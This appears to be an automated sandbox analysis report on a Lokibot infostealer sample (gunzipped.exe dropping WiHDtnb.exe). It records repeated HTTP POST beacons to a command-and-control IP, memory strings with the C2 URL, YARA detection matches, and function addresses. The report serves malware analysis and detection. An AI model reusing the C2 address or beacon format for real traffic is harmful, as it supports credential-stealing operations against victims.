                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: unknownTCP traffic detected without corresponding DNS query: 136.244.109.75
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_00404ED4 recv,12_2_00404ED4
                Source: unknownHTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 180Connection: close
                Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, gunzipped.exe, 00000007.00000002.3213971046.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://136.244.109.75/index.php/1748937
                Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://136.244.109.75/index.php/comments/feed/
                Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://136.244.109.75/index.php/feed/
                Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://136.244.109.75/index.php/wp-json/
                Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                Source: gunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, WiHDtnb.exe, 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: WiHDtnb.exe, WiHDtnb.exe, 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/

                System Summary

                barindex
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: gunzipped.exe, ArffAttribute.csLarge array initialization: : array initializer size 467652
                Source: 0.2.gunzipped.exe.5110000.5.raw.unpack, .csLarge array initialization: : array initializer size 13798
                Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, .csLarge array initialization: : array initializer size 13798
                Source: 9.2.WiHDtnb.exe.2c6d1d4.0.raw.unpack, .csLarge array initialization: : array initializer size 13798
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_0251E0300_2_0251E030
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052FC7480_2_052FC748
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052F45980_2_052F4598
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052F4E080_2_052F4E08
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052F6EE00_2_052F6EE0
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052F49C00_2_052F49C0
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052F49D00_2_052F49D0
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052F52300_2_052F5230
                Source: C:\Users\user\Desktop\gunzipped.exeCode function: 0_2_052F52400_2_052F5240
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_0131E0309_2_0131E030
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_0632B8609_2_0632B860
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_06324E089_2_06324E08
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_06326EE09_2_06326EE0
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_063217F09_2_063217F0
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_0632456A9_2_0632456A
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_063245989_2_06324598
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_063252309_2_06325230
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_063252409_2_06325240
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_063209189_2_06320918
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_063249D09_2_063249D0
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 9_2_063249C09_2_063249C0
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_0040549C12_2_0040549C
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: 12_2_004029D412_2_004029D4
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Roaming\WiHDtnb.exeCode function: String function: 00405B6F appears 42 times
                Source: gunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.1996175319.0000000005110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.1994339680.00000000039C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.1994339680.0000000003968000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
                Source: gunzipped.exe, 00000000.00000002.1997330585.0000000005CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
